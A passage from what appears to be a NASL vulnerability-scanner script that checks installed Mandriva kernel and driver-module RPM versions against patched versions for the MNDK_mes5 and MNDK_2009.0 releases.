rpm:\"nvidia173-kernel-desktop586-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-desktop-latest\", rpm:\"nvidia173-kernel-desktop-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel\", rpm:\"nvidia71xx-kernel~2.6.27.56~desktop~1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-server-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop586-latest\", rpm:\"nvidia71xx-kernel-desktop586-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop-latest\", rpm:\"nvidia71xx-kernel-desktop-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia71xx-kernel-server-latest\", rpm:\"nvidia71xx-kernel-server-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel\", rpm:\"nvidia96xx-kernel~2.6.27.56~desktop~1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-server-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop586-latest\", rpm:\"nvidia96xx-kernel-desktop586-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop-latest\", rpm:\"nvidia96xx-kernel-desktop-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-server-latest\", rpm:\"nvidia96xx-kernel-server-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel\", rpm:\"nvidia-current-kernel~2.6.27.56~server~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop586-latest\", rpm:\"nvidia-current-kernel-desktop586-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop-latest\", rpm:\"nvidia-current-kernel-desktop-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-server-latest\", rpm:\"nvidia-current-kernel-server-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel\", rpm:\"vpnclient-kernel~2.6.27.56~desktop~1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-server-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-server-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-desktop586-latest\", rpm:\"vpnclient-kernel-desktop586-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-desktop-latest\", rpm:\"vpnclient-kernel-desktop-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-server-latest\", rpm:\"vpnclient-kernel-server-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel\", rpm:\"libafs-kernel~2.6.27.56~desktop~1mnb~1.4.7~5.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-2.6.27.56-server-1mnb\", rpm:\"libafs-kernel-2.6.27.56-server-1mnb~1.4.7~5.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-desktop-latest\", rpm:\"libafs-kernel-desktop-latest~1.4.7~1.20101216.5.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libafs-kernel-server-latest\", rpm:\"libafs-kernel-server-latest~1.4.7~1.20101216.5.1mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~server~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-server-latest\", rpm:\"nvidia173-kernel-server-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_mes5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"MNDK_2009.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"alsa_raoppcm-kernel\", rpm:\"alsa_raoppcm-kernel~2.6.27.56~desktop~1mnb~0.5.1~2mdv2008.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"alsa_raoppcm-kernel-2.6.27.56-desktop586-1mnb~0.5.1~2mdv2008.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-2.6.27.56-server-1mnb\", rpm:\"alsa_raoppcm-kernel-2.6.27.56-server-1mnb~0.5.1~2mdv2008.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-desktop586-latest\", rpm:\"alsa_raoppcm-kernel-desktop586-latest~0.5.1~1.20101216.2mdv2008.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-desktop-latest\", rpm:\"alsa_raoppcm-kernel-desktop-latest~0.5.1~1.20101216.2mdv2008.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-server-latest\", rpm:\"alsa_raoppcm-kernel-server-latest~0.5.1~1.20101216.2mdv2008.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel\", rpm:\"drm-experimental-kernel~2.6.27.56~desktop~1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-server-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-server-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop586-latest\", rpm:\"drm-experimental-kernel-desktop586-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop-latest\", rpm:\"drm-experimental-kernel-desktop-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drm-experimental-kernel-server-latest\", rpm:\"drm-experimental-kernel-server-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"et131x-kernel\", rpm:\"et131x-kernel~2.6.27.56~desktop~1mnb~1.2.3~7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"et131x-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"et131x-kernel-2.6.27.56-desktop586-1mnb~1.2.3~7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"et131x-kernel-2.6.27.56-server-1mnb\", rpm:\"et131x-kernel-2.6.27.56-server-1mnb~1.2.3~7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"et131x-kernel-desktop586-latest\", rpm:\"et131x-kernel-desktop586-latest~1.2.3~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"et131x-kernel-desktop-latest\", rpm:\"et131x-kernel-desktop-latest~1.2.3~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"et131x-kernel-server-latest\", rpm:\"et131x-kernel-server-latest~1.2.3~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fcpci-kernel\", rpm:\"fcpci-kernel~2.6.27.56~desktop~1mnb~3.11.07~7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fcpci-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"fcpci-kernel-2.6.27.56-desktop586-1mnb~3.11.07~7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fcpci-kernel-2.6.27.56-server-1mnb\", rpm:\"fcpci-kernel-2.6.27.56-server-1mnb~3.11.07~7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fcpci-kernel-desktop586-latest\", rpm:\"fcpci-kernel-desktop586-latest~3.11.07~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fcpci-kernel-desktop-latest\", rpm:\"fcpci-kernel-desktop-latest~3.11.07~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fcpci-kernel-server-latest\", rpm:\"fcpci-kernel-server-latest~3.11.07~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel\", rpm:\"fglrx-kernel~2.6.27.56~desktop~1mnb~8.522~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-desktop586-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-server-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-server-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-desktop586-latest\", rpm:\"fglrx-kernel-desktop586-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-desktop-latest\", rpm:\"fglrx-kernel-desktop-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"fglrx-kernel-server-latest\", rpm:\"fglrx-kernel-server-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gnbd-kernel-2.6.27.56-desktop-1mnb\", rpm:\"gnbd-kernel-2.6.27.56-desktop-1mnb~2.03.07~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gnbd-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"gnbd-kernel-2.6.27.56-desktop586-1mnb~2.03.07~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gnbd-kernel\", rpm:\"gnbd-kernel~2.6.27.56~server~1mnb~2.03.07~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gnbd-kernel-desktop586-latest\", rpm:\"gnbd-kernel-desktop586-latest~2.03.07~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gnbd-kernel-desktop-latest\", rpm:\"gnbd-kernel-desktop-latest~2.03.07~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gnbd-kernel-server-latest\", rpm:\"gnbd-kernel-server-latest~2.03.07~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hcfpcimodem-kernel\", rpm:\"hcfpcimodem-kernel~2.6.27.56~desktop~1mnb~1.17~1.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hcfpcimodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"hcfpcimodem-kernel-2.6.27.56-desktop586-1mnb~1.17~1.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hcfpcimodem-kernel-2.6.27.56-server-1mnb\", rpm:\"hcfpcimodem-kernel-2.6.27.56-server-1mnb~1.17~1.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hcfpcimodem-kernel-desktop586-latest\", rpm:\"hcfpcimodem-kernel-desktop586-latest~1.17~1.20101216.1.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hcfpcimodem-kernel-desktop-latest\", rpm:\"hcfpcimodem-kernel-desktop-latest~1.17~1.20101216.1.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hcfpcimodem-kernel-server-latest\", rpm:\"hcfpcimodem-kernel-server-latest~1.17~1.20101216.1.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hsfmodem-kernel\", rpm:\"hsfmodem-kernel~2.6.27.56~desktop~1mnb~7.68.00.13~1.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hsfmodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"hsfmodem-kernel-2.6.27.56-desktop586-1mnb~7.68.00.13~1.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hsfmodem-kernel-2.6.27.56-server-1mnb\", rpm:\"hsfmodem-kernel-2.6.27.56-server-1mnb~7.68.00.13~1.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hsfmodem-kernel-desktop586-latest\", rpm:\"hsfmodem-kernel-desktop586-latest~7.68.00.13~1.20101216.1.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hsfmodem-kernel-desktop-latest\", rpm:\"hsfmodem-kernel-desktop-latest~7.68.00.13~1.20101216.1.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hsfmodem-kernel-server-latest\", rpm:\"hsfmodem-kernel-server-latest~7.68.00.13~1.20101216.1.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hso-kernel\", rpm:\"hso-kernel~2.6.27.56~desktop~1mnb~1.2~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hso-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"hso-kernel-2.6.27.56-desktop586-1mnb~1.2~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hso-kernel-2.6.27.56-server-1mnb\", rpm:\"hso-kernel-2.6.27.56-server-1mnb~1.2~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hso-kernel-desktop586-latest\", rpm:\"hso-kernel-desktop586-latest~1.2~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hso-kernel-desktop-latest\", rpm:\"hso-kernel-desktop-latest~1.2~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hso-kernel-server-latest\", rpm:\"hso-kernel-server-latest~1.2~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel\", rpm:\"iscsitarget-kernel~2.6.27.56~desktop~1mnb~0.4.16~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb~0.4.16~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-server-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-server-1mnb~0.4.16~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop586-latest\", rpm:\"iscsitarget-kernel-desktop586-latest~0.4.16~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop-latest\", rpm:\"iscsitarget-kernel-desktop-latest~0.4.16~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kernel-server-latest\", rpm:\"iscsitarget-kernel-server-latest~0.4.16~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586\", rpm:\"kernel-desktop586~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586-devel\", rpm:\"kernel-desktop586-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586-devel-latest\", rpm:\"kernel-desktop586-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop586-latest\", rpm:\"kernel-desktop586-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-latest\", rpm:\"kernel-desktop-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-latest\", rpm:\"kernel-desktop-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server\", rpm:\"kernel-server~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server-devel\", rpm:\"kernel-server-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server-devel-latest\", rpm:\"kernel-server-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-server-latest\", rpm:\"kernel-server-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel\", rpm:\"kqemu-kernel~2.6.27.56~desktop~1mnb~1.4.0pre1~0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"kqemu-kernel-2.6.27.56-desktop586-1mnb~1.4.0pre1~0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-server-1mnb\", rpm:\"kqemu-kernel-2.6.27.56-server-1mnb~1.4.0pre1~0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-desktop586-latest\", rpm:\"kqemu-kernel-desktop586-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-desktop-latest\", rpm:\"kqemu-kernel-desktop-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kqemu-kernel-server-latest\", rpm:\"kqemu-kernel-server-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lirc-kernel\", rpm:\"lirc-kernel~2.6.27.56~desktop~1mnb~0.8.3~4.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lirc-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"lirc-kernel-2.6.27.56-desktop586-1mnb~0.8.3~4.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lirc-kernel-2.6.27.56-server-1mnb\", rpm:\"lirc-kernel-2.6.27.56-server-1mnb~0.8.3~4.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lirc-kernel-desktop586-latest\", rpm:\"lirc-kernel-desktop586-latest~0.8.3~1.20101216.4.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lirc-kernel-desktop-latest\", rpm:\"lirc-kernel-desktop-latest~0.8.3~1.20101216.4.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lirc-kernel-server-latest\", rpm:\"lirc-kernel-server-latest~0.8.3~1.20101216.4.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lzma-kernel\", rpm:\"lzma-kernel~2.6.27.56~desktop~1mnb~4.43~24mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lzma-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"lzma-kernel-2.6.27.56-desktop586-1mnb~4.43~24mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lzma-kernel-2.6.27.56-server-1mnb\", rpm:\"lzma-kernel-2.6.27.56-server-1mnb~4.43~24mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lzma-kernel-desktop586-latest\", rpm:\"lzma-kernel-desktop586-latest~4.43~1.20101216.24mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lzma-kernel-desktop-latest\", rpm:\"lzma-kernel-desktop-latest~4.43~1.20101216.24mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lzma-kernel-server-latest\", 